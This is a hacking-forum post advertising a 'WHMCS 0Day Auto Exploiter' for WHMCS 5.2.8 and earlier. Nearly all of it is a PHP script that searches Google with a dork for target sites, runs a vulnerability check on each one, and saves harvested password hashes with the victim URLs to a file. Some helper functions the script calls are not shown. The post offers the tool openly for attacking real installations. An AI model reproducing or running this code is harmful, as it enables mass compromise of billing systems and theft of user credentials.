• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

WHCMS 0Day Auto Exploiter 5.2.8b

Status
Not open for further replies.

clickers

Banned
User
Joined
Jun 22, 2017
Messages
5
Reputation
0
Reaction score
36
Points
13
Credits
0
‎8 Years of Service‎
100%
WHMCS Auto Xploiter (0day)
[For WHMCS ver. <= 5.2.8]



Google Dork: <?phpif(isset($_POST['dork']{0})) {$file = fopen("WMCS-Hashes.txt","a");echo '
Scanning has been started... Good luck! ;)

';letItBy();for($googlePage = 1; $googlePage <= 50; $googlePage++) {$googleResult = google_that($_POST['dork'], $googlePage);if(!$googleResult) {echo 'Finished scanning.';fclose($file);break;}for($victim = 0; $victim < sizeof($googleResult); $victim++){$result = check_vuln($googleResult[$victim]['unescapedUrl']);$alexa = getAlexa($googleResult[$victim]['unescapedUrl']);if($result != "Fail!") {$hashes = "";foreach ($result as $record) {$hashes = $hashes . str_replace(':::::','',$record) . "\n";}$sep = "========================================================\n";$data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";fwrite($file,$data);echo "
Successfully Xploited...";echo '';echo "
Code:
" . $data . "
";}else {echo '';echo "{$googleResult[$victim]['titleNoFormatting']} - Failed!";echo "\n
";}letItBy();}}echo '
';}?>



Coded by: g00n | Skype: t3hg00n


For more tools/scripts/exploits/etc.
visit
This link is hidden for visitors. Please Log in or register now.


 
Last edited by a moderator:
Status
Not open for further replies.
Back
Top